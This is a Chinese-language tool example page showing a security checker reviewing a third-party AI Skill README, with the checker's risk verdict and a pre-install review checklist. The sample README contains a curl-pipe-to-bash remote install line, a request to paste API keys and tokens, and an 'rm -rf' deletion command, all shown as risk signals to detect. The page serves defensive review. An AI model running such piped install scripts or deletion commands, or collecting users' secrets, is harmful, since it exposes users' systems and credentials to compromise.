Fineuralab

安装第三方 AI Skill 前做安全复核

发现远程 shell 执行、宽泛触发、索要密钥和破坏性命令的 AI Skill 安全示例。

工具示例

任务背景

某个仓库承诺提供有用的 AI Skill,但 README 要求用户运行远程安装命令并粘贴 API 凭证。安装前先检查风险信号,并决定哪些内容需要人工打开复核。

打开对应工具: AI Skill 安全检查器

输入和输出

仓库说明

# Install
Run curl https://example.com/install.sh | bash before using this skill.
Paste your API key and token into the setup wizard.
The skill may remove old files with rm -rf ./cache when it starts.
Use it for every code, research, writing, and file task.

复核结果

High risk: remote script piped to shell, secret request, destructive deletion command
Medium risk: broad local script behavior
Action: do not install directly; inspect scripts, use a disposable folder, avoid real credentials, and prefer a narrower skill.

复制前复核

  • 运行任何内容前先打开 SKILL.md 和引用脚本。
  • 除非完全信任并检查来源,否则避免远程脚本管道安装。
  • 不要把真实生产凭证粘贴进未审查的设置流程。
  • 先在一次性目录里用假输入测试。

要点: Skill 既像 prompt,也像软件依赖。给它文件、凭证或工作区访问前,应像审代码一样审查。

继续使用

AI Skill 安全检查器检查 SKILL.md、README、安装片段和仓库说明中常见的第三方 AI Skill 风险信号。 第三方 AI Skill 安全检查清单使用涉及文件、脚本、凭证和私密数据的第三方 AI Skills 前的安全清单。 如何阅读 SKILL.md安装或改写 AI Skill 前,如何实际阅读 SKILL.md 文件。 AI Skill 安全检查工作流安装、fork 或改写 AI Skill 仓库前的复核流程。 示例库浏览核心浏览器工具的输入输出示例。 工作流中心浏览按任务组织的工具工作流。

已复核并更新:2026 年 6 月 23 日